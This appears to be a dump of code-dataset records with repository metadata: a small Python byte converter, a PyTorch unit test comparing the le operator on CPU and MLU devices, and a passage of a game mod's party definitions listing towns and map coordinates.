onsoim/FuzzBuilderEx
|
d0e8bada27677a0f676e92dc48aaa764ba679508
|
[
"Apache-2.0"
] | 4
|
2021-03-24T00:10:59.000Z
|
2022-03-28T13:41:28.000Z
|
source/script/FASelector_SRC/Utils/Converter.py
|
onsoim/FuzzBuilderEx
|
d0e8bada27677a0f676e92dc48aaa764ba679508
|
[
"Apache-2.0"
] | 2
|
2021-04-05T06:22:20.000Z
|
2021-10-01T21:07:18.000Z
|
class CONVERTER:
    """Byte-sequence decoder bound to a fixed byte order."""

    def __init__(self, endian):
        # Byte order string as accepted by int.from_bytes: 'big' or 'little'.
        self.endian = endian

    def bytes2int(self, bytes):
        """Return *bytes* decoded as an unsigned integer in self.endian order."""
        # NOTE: the parameter shadows the builtin `bytes`; kept for
        # backward compatibility with keyword callers.
        return int.from_bytes(bytes, self.endian)
| 28.333333
| 59
| 0.676471
| 21
| 170
| 5.238095
| 0.571429
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007576
| 0.223529
| 170
| 6
| 59
| 28.333333
| 0.825758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
62e9f95aca72c9083383a82f0fa3775ad3a8a98d
| 11,285
|
py
|
Python
|
test/cnnl/op_test/test_le.py
|
Cambricon/catch
|
2625da389f25a67066d20fb6b0c38250ef98f8ab
|
[
"BSD-2-Clause"
] | 20
|
2022-03-01T11:40:51.000Z
|
2022-03-30T08:17:47.000Z
|
test/cnnl/op_test/test_le.py
|
Cambricon/catch
|
2625da389f25a67066d20fb6b0c38250ef98f8ab
|
[
"BSD-2-Clause"
] | null | null | null |
test/cnnl/op_test/test_le.py
|
Cambricon/catch
|
2625da389f25a67066d20fb6b0c38250ef98f8ab
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import print_function
import sys
import os
# NOTE(review): presumably must be set before torch_mlu is imported so CNNL
# ops fail loudly instead of being silently caught — confirm with torch_mlu.
os.environ['ENABLE_CNNL_TRYCATCH']='OFF' # pylint: disable=C0413
import unittest
import logging
import torch
import torch_mlu.core.mlu_model as ct
# Make the shared test helpers (common_utils) importable from two levels up.
cur_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(cur_dir + "/../../")
from common_utils import testinfo, TestCase # pylint: disable=C0411, C0413
logging.basicConfig(level=logging.DEBUG)
class TestLeOp(TestCase):
    """Compare torch.le / Tensor.le_ / the '<=' operator on MLU against the
    CPU reference, across dtypes, broadcast shapes, memory formats, in-place
    and out= variants.

    NOTE(review): requires MLU hardware via torch_mlu; `self.to_mlu`,
    `assertTensorsEqual` and `testinfo` come from common_utils — not visible
    here.
    """

    # @unittest.skip("not test")
    @testinfo()
    def test_le(self):
        """Functional le() and '<=' with broadcasting, all listed dtypes."""
        type_list = [
            torch.bool, torch.float, torch.int, torch.short, torch.int8,
            torch.uint8, torch.long, torch.half
        ]
        for t in type_list:
            # NOTE(review): (1) and (5) are plain ints, not 1-tuples;
            # torch.randn accepts both forms, so behavior is unaffected.
            for shape1, shape2 in [((), ()), ((), (1)),
                                   ((), (256, 144, 7, 15, 2, 1)),
                                   ((1), (256, 7)),
                                   ((5), (5)),
                                   ((2, 3, 4), (3, 4)),
                                   ((1, 117, 1, 4, 1, 5, 1, 2), (117, 1, 5, 1, 5, 1, 3, 1)),
                                   ((1), (256, 144, 7, 15, 2, 1, 1, 1))]:
                x = torch.randn(shape1).to(t)
                y = torch.randn(shape2).to(t)
                out_cpu = torch.le(x, y)
                out_mlu = torch.le(self.to_mlu(x), self.to_mlu(y))
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
                # Same comparison through the operator protocol (__le__).
                out_cpu = x <= y
                out_mlu = self.to_mlu(x) <= self.to_mlu(y)
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_le_not_dense(self):
        """le() on non-contiguous inputs (sliced along the last dim)."""
        type_list = [
            torch.bool, torch.float, torch.int, torch.short, torch.int8,
            torch.uint8, torch.long, torch.half
        ]
        for t in type_list:
            for shape1, shape2 in [((12, 15, 18, 26), (12, 15, 18, 50)),
                                   ((1), (20, 144, 8, 30))]:
                x = torch.randn(shape1).to(t)
                y = torch.randn(shape2).to(t)
                # Slicing y makes the operand non-dense (strided view).
                out_cpu = torch.le(x, y[:,:,:,10:36])
                y_mlu = self.to_mlu(y)
                out_mlu = torch.le(self.to_mlu(x), y_mlu[:,:,:,10:36])
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
                out_cpu = x <= y[:,:,:,10:36]
                out_mlu = self.to_mlu(x) <= y_mlu[:,:,:,10:36]
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_le_channel_last(self):
        """le() with channels-last and mixed memory formats."""
        type_list = [
            torch.bool, torch.float, torch.int, torch.short, torch.int8,
            torch.uint8, torch.long, torch.half
        ]
        for t in type_list:
            for shape1 in [(12, 15, 18, 26),
                           (20, 144, 8, 30)]:
                x = torch.randn(shape1).to(t)
                y = torch.randn(shape1).to(t)
                x_cl = self.convert_to_channel_last(x)
                y_cl = self.convert_to_channel_last(y)
                out_cpu = torch.le(x_cl, y_cl)
                x_mlu_cl = self.convert_to_channel_last(self.to_mlu(x))
                y_mlu_cl = self.convert_to_channel_last(self.to_mlu(y))
                out_mlu = torch.le(x_mlu_cl, y_mlu_cl)
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
                out_cpu = x_cl <= y_cl
                out_mlu = x_mlu_cl <= y_mlu_cl
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
                # mixed memory format
                z = torch.randn(shape1).to(t)
                out_cpu = torch.le(x, z)
                out_mlu = torch.le(self.to_mlu(x), self.to_mlu(z))
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
                out_cpu = x <= z
                out_mlu = self.to_mlu(x) <= self.to_mlu(z)
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_le_inplace(self):
        """In-place le_() must keep the MLU tensor's storage (same data_ptr)."""
        type_list = [
            torch.bool, torch.float, torch.int, torch.short, torch.int8,
            torch.uint8, torch.long, torch.half
        ]
        for t in type_list:
            for shape1, shape2 in [((), ()), ((), (1)),
                                   ((), (256, 144, 7, 15, 2, 1)),
                                   ((1), (256, 7)),
                                   ((5), (5)),
                                   ((1, 117, 1, 4, 1, 1, 1, 1), (117, 117, 5, 4, 5, 1, 3, 1)),
                                   ((1), (256, 144, 7, 15, 2, 1, 1, 1))]:
                x = torch.randn(shape1).to(t)
                y = torch.randn(shape2).to(t)
                x_mlu = x.to("mlu")
                y_mlu = y.to("mlu")
                y_mlu_data = y_mlu.data_ptr()
                y.le_(x)
                y_mlu.le_(x_mlu)
                # In-place op must not have reallocated the MLU buffer.
                self.assertEqual(y_mlu_data, y_mlu.data_ptr())
                self.assertTensorsEqual(y.float(), y_mlu.cpu().float(), 0.0, use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_le_inplace_channel_last(self):
        """In-place le_() with channels-last and mixed memory formats."""
        type_list = [
            torch.bool, torch.float, torch.int, torch.short, torch.int8,
            torch.long, torch.half, torch.uint8
        ]
        for t in type_list:
            for shape1, shape2 in [((5, 3, 4, 1), (1, 3, 4, 1))]:
                # both channel last
                x = torch.randn(shape2).to(t).to(memory_format=torch.channels_last)
                y = torch.randn(shape1).to(t).to(memory_format=torch.channels_last)
                x_mlu = x.to("mlu")
                y_mlu = y.to("mlu")
                y.le_(x)
                y_mlu_data = y_mlu.data_ptr()
                y_mlu.le_(x_mlu)
                self.assertEqual(y_mlu_data, y_mlu.data_ptr())
                self.assertTensorsEqual(y.float(), y_mlu.cpu().float(), 0.0, use_MSE=True)
                # mixed memory format
                z = torch.randn(shape1).to(t)
                z_mlu = z.to("mlu")
                z.le_(x)
                z_mlu_data = z_mlu.data_ptr()
                z_mlu.le_(x_mlu)
                self.assertEqual(z_mlu_data, z_mlu.data_ptr())
                self.assertTensorsEqual(z.float(), z_mlu.cpu().float(), 0.0, use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_le_inplace_not_dense(self):
        """In-place le_() on strided (sliced) views of both operands."""
        type_list = [
            torch.bool, torch.float, torch.int, torch.short, torch.int8,
            torch.long, torch.half, torch.uint8
        ]
        for t in type_list:
            for shape1, shape2 in [((3, 4), (2, 3, 4))]:
                x = torch.randn(shape1).to(t)
                y = torch.randn(shape2).to(t)
                x_mlu = x.to("mlu")
                y_mlu = y.to("mlu")
                y[:, :, :2].le_(x[:, :2])
                y_mlu_data = y_mlu.data_ptr()
                y_mlu[:, :, :2].le_(x_mlu[:, :2])
                self.assertEqual(y_mlu_data, y_mlu.data_ptr())
                self.assertTensorsEqual(y.float(), y_mlu.cpu().float(), 0.0, use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_le_out(self):
        """torch.le(..., out=...) writing into preallocated bool tensors."""
        type_list = [
            torch.bool, torch.float, torch.int, torch.short, torch.int8,
            torch.uint8, torch.long, torch.half
        ]
        for t in type_list:
            for shape1, shape2 in [((), ()), ((), (1)),
                                   ((), (256, 144, 7, 15, 2, 1)),
                                   ((1), (256, 7)),
                                   ((5), (5)),
                                   ((2, 3, 4), (3, 4)),
                                   ((1, 117, 1, 4, 1, 1, 1, 1), (117, 117, 5, 4, 5, 1, 3, 1)),
                                   ((256, 144, 7, 15, 2, 1, 1, 1), (1)),
                                   ((1), (256, 144, 7, 15, 2, 1, 1, 1))]:
                x = torch.randn(shape1).to(t)
                y = torch.randn(shape2).to(t)
                out_tmpcpu = torch.zeros(shape2, dtype=torch.bool)
                out_tmpmlu = torch.zeros(shape2, dtype=torch.bool).to("mlu")
                torch.le(x, y, out=out_tmpcpu)
                torch.le(self.to_mlu(x), self.to_mlu(y), out=out_tmpmlu)
                self.assertTensorsEqual(
                    out_tmpcpu.float(), out_tmpmlu.cpu().float(), 0.0, use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_le_scalar(self):
        """le() and '<=' against a Python scalar right-hand side."""
        type_list = [
            torch.bool, torch.float, torch.int, torch.short, torch.int8,
            torch.uint8, torch.long, torch.half
        ]
        for t in type_list:
            for shape in [(), (256, 144, 7, 15, 2, 1), (1), (256, 7),
                          (2, 3, 4), (117, 1, 5, 1, 5, 1, 3, 1),
                          (256, 144, 7, 15, 2, 1, 1, 1)]:
                x = torch.randn(shape).to(t)
                # .item() turns the 0-d tensor into a Python scalar.
                y = torch.randn(()).to(t).item()
                out_cpu = torch.le(x, y)
                out_mlu = torch.le(self.to_mlu(x), y)
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
                out_cpu = x <= y
                out_mlu = self.to_mlu(x) <= y
                self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_le_inplace_scalar(self):
        """In-place le_() against a Python scalar, storage preserved."""
        type_list = [
            torch.bool, torch.float, torch.int, torch.short, torch.int8,
            torch.uint8, torch.long, torch.half
        ]
        for t in type_list:
            for shape in [(), (256, 144, 7, 15, 2, 1), (1,), (256, 7),
                          (2, 3, 4), (117, 1, 5, 1, 5, 1, 3, 1),
                          (256, 144, 7, 15, 2, 1, 1, 1)]:
                x = torch.randn(shape).to(t)
                y = torch.randn(()).to(t).item()
                x_mlu = x.to('mlu')
                x_mlu_data = x_mlu.data_ptr()
                x.le_(y)
                x_mlu.le_(y)
                self.assertEqual(x_mlu_data, x_mlu.data_ptr())
                self.assertTensorsEqual(x.float(), x_mlu.cpu().float(), 0.0, use_MSE=True)

    # @unittest.skip("not test")
    @testinfo()
    def test_le_out_scalar(self):
        """torch.le(tensor, scalar, out=...) into preallocated bool tensors."""
        type_list = [
            torch.bool, torch.float, torch.int, torch.short, torch.int8,
            torch.uint8, torch.long, torch.half
        ]
        for t in type_list:
            for shape in [(), (256, 144, 7, 15, 2, 1), (1), (256, 7),
                          (2, 3, 4), (117, 1, 5, 1, 5, 1, 3, 1),
                          (256, 144, 7, 15, 2, 1, 1, 1)]:
                x = torch.randn(shape).to(t)
                y = torch.randn(()).to(t).item()
                out_tmpcpu = torch.zeros(shape, dtype=torch.bool)
                out_tmpmlu = torch.zeros(shape, dtype=torch.bool).to('mlu')
                torch.le(x, y, out=out_tmpcpu)
                torch.le(self.to_mlu(x), y, out=out_tmpmlu)
                self.assertTensorsEqual(
                    out_tmpcpu.float(), out_tmpmlu.cpu().float(), 0.0, use_MSE=True)
if __name__ == '__main__':
    # Allow running these MLU tests directly: python test_le.py
    unittest.main()
| 43.571429
| 98
| 0.472574
| 1,516
| 11,285
| 3.341689
| 0.076517
| 0.012238
| 0.031978
| 0.033557
| 0.899131
| 0.877813
| 0.848993
| 0.817015
| 0.787011
| 0.777537
| 0
| 0.068256
| 0.371644
| 11,285
| 258
| 99
| 43.74031
| 0.646171
| 0.033496
| 0
| 0.605381
| 0
| 0
| 0.006244
| 0
| 0
| 0
| 0
| 0
| 0.098655
| 1
| 0.044843
| false
| 0
| 0.035874
| 0
| 0.085202
| 0.004484
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1a26cacf37bcd7384e0c6709554f3374e9a3e21e
| 247,892
|
py
|
Python
|
src/module_parties.py
|
faycalki/tainted-paths
|
81cecf6c1fba903ec3b8043e22652d222892609d
|
[
"MIT"
] | 4
|
2019-09-26T21:34:32.000Z
|
2021-11-18T19:31:15.000Z
|
src/module_parties.py
|
faycalki/tainted-paths
|
81cecf6c1fba903ec3b8043e22652d222892609d
|
[
"MIT"
] | null | null | null |
src/module_parties.py
|
faycalki/tainted-paths
|
81cecf6c1fba903ec3b8043e22652d222892609d
|
[
"MIT"
] | null | null | null |
from header_common import *
from header_parties import *
from ID_troops import *
from ID_factions import *
from ID_party_templates import *
from ID_map_icons import *
####################################################################################################################
# Each party record contains the following fields:
# 1) Party id: used for referencing parties in other files.
# The prefix p_ is automatically added before each party id.
# 2) Party name.
# 3) Party flags. See header_parties.py for a list of available flags
# 4) Menu. ID of the menu to use when this party is met. The value 0 uses the default party encounter system.
# 5) Party-template. ID of the party template this party belongs to. Use pt_none as the default value.
# 6) Faction.
# 7) Personality. See header_parties.py for an explanation of personality flags.
# 8) Ai-behavior
# 9) Ai-target party
# 10) Initial coordinates.
# 11) List of stacks. Each stack record is a triple that contains the following fields:
# 11.1) Troop-id.
# 11.2) Number of troops in this stack.
# 11.3) Member flags. Use pmf_is_prisoner to note that this member is a prisoner.
# 12) Party direction in degrees [optional]
####################################################################################################################
no_menu = 0
parties = [
("main_party", "Player Army", icon_player_horseman|pf_limit_members, no_menu, pt_none, fac_player_faction, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [(trp_player, 1, 0)]),
("temp_party", "None", icon_player|pf_disabled, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("camp_bandits", "{!}camp bandits", icon_player|pf_disabled, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [(trp_temp_troop, 3, 0)]),
("exparty_backup", "{!}", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_party_2", "{!}temp party 2", icon_player|pf_disabled, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_casualties", "{!}casualties", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_casualties_2", "{!}casualties", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_casualties_3", "{!}casualties", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_wounded", "{!}enemies wounded", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_killed", "{!}enemies killed", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("main_party_backup", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("encountered_party_backup", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("collective_friends_backup", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("player_casualties", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("enemy_casualties", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ally_casualties", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("collective_enemy", "{!}collective enemy", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("collective_ally", "{!}collective ally", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("collective_friends", "{!}collective ally", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("total_enemy_casualties", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("routed_enemies", "{!}routed enemies", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("zendar", "none", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("town_1", "nnn", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("castle_1", "nnn", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("village_1", "nnn", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("salt_mine", "nnn", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("four_ways_inn", "nnn (inn)", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("test_scene", "test scene", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("battlefields", "battlefields", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("dhorak_keep", "Dhorak Keep", icon_point_mark|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("training_ground", "Training ground", icon_cantsee|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("training_ground_1", "Training ground", icon_cantsee|pf_disabled|pf_label_large|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [], 100.0),
("training_ground_2", "Training ground", icon_cantsee|pf_disabled|pf_label_large|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [], 100.0),
("training_ground_3", "Training ground", icon_cantsee|pf_disabled|pf_label_large|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [], 100.0),
("training_ground_4", "Training ground", icon_cantsee|pf_disabled|pf_label_large|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [], 100.0),
("training_ground_5", "Training ground", icon_cantsee|pf_disabled|pf_label_large|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [], 100.0),
("pyongyang", "Pyongyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1144.42, -170.76), [], 170.0),
("hanseong", "Hanseong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1158.0, -152.04), []),
("hoeryong", "Hoeryong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1186.4, -212.0), [], 125.0),
("hamhung", "Hamhung", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1165.2, -185.2), [], 45.0),
("jeonju", "Jeonju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1157.76, -130.56), [], 245.0),
("gaesung", "Gaesung", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1152.76, -158.24), [], 175.0),
("chungju", "Chungju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1167.8, -144.6), [], 260.0),
("jinju", "Jinju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1170.32, -121.64), [], 95.0),
("sangju", "Sangju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1170.88, -137.04), [], 55.0),
("gilju", "Gilju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1179.2, -194.0), [], 65.0),
("uiju", "Uiju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1132.4, -182.0), [], 125.0),
("gangleung", "Gangleung", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1178.64, -152.8), [], 75.0),
("busan", "Busan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1181.04, -123.44), [], 280.0),
("jeju", "Jeju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1152.8, -101.76), [], 100.0),
("hyesan", "Hyesan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1171.16, -199.42), [], 110.0),
("gongju", "Gongju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1160.12, -138.52), [], 120.0),
("haeju", "Haeju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1145.48, -156.14), [], 130.0),
("naju", "Naju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1154.92, -120.56), [], 170.0),
("cheongjin", "Cheongjin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1187.8, -205.36), [], 170.0),
("wonsan", "Wonsan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1162.6, -171.08), [], 260.0),
("sokcho", "Sokcho", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1175.0, -159.08), [], 45.0),
("myohyangsan", "Myohyangsan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1153.8, -183.28), [], 125.0),
("nampo", "Nampo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1139.98, -166.6), []),
("chuncheon", "Chuncheon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1165.84, -155.6), [], 270.0),
("ganggae", "Ganggae", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1153.28, -194.08), [], 110.0),
("ulsan", "Ulsan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1182.8, -127.2), [], 240.0),
("athens", "Athens", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-29.68, -156.4), [], 260.0),
("sparta", "Sparta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-16.52, -145.2), [], 180.0),
("pella", "Pella", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-6.68, -202.76), [], 110.0),
("crete", "Crete", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-43.6, -122.0), [], 180.0),
("dalmatia", "Dalmatia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (39.2, -224.8), [], 160.0),
("philippopolis", "Philippopolis", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-41.2, -209.96), [], 240.0),
("buthrotum", "Buthrotum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (12.48, -183.64), [], 15.0),
("patra", "Patra", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-8.46, -159.28), []),
("larissa", "Larissa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-16.24, -178.8), [], 15.0),
("sarajevo", "Sarajevo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (28.16, -232.36), [], 180.0),
("trikala", "Trikala", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-8.0, -177.6), [], 45.0),
("corinth", "Corinth", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-22.28, -152.16), [], 240.0),
("thessalonica", "Thessalonica", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-21.16, -190.56), [], 240.0),
("khania", "Khania", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-32.4, -125.6), [], 90.0),
("sardika", "Sardika", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-25.44, -217.32), [], 155.0),
("darryhachium", "Darryhachium", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (16.16, -195.64), [], 45.0),
("arta", "Arta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-0.76, -172.56), [], 180.0),
("carthage", "Carthage", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (118.88, -142.56), [], 25.0),
("gabes", "Gabes", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (122.2, -109.68), [], 75.0),
("bejaia", "Bejaia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (174.96, -140.48), [], 90.0),
("syracuse", "Syracuse", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (63.86, -146.1), [], 120.0),
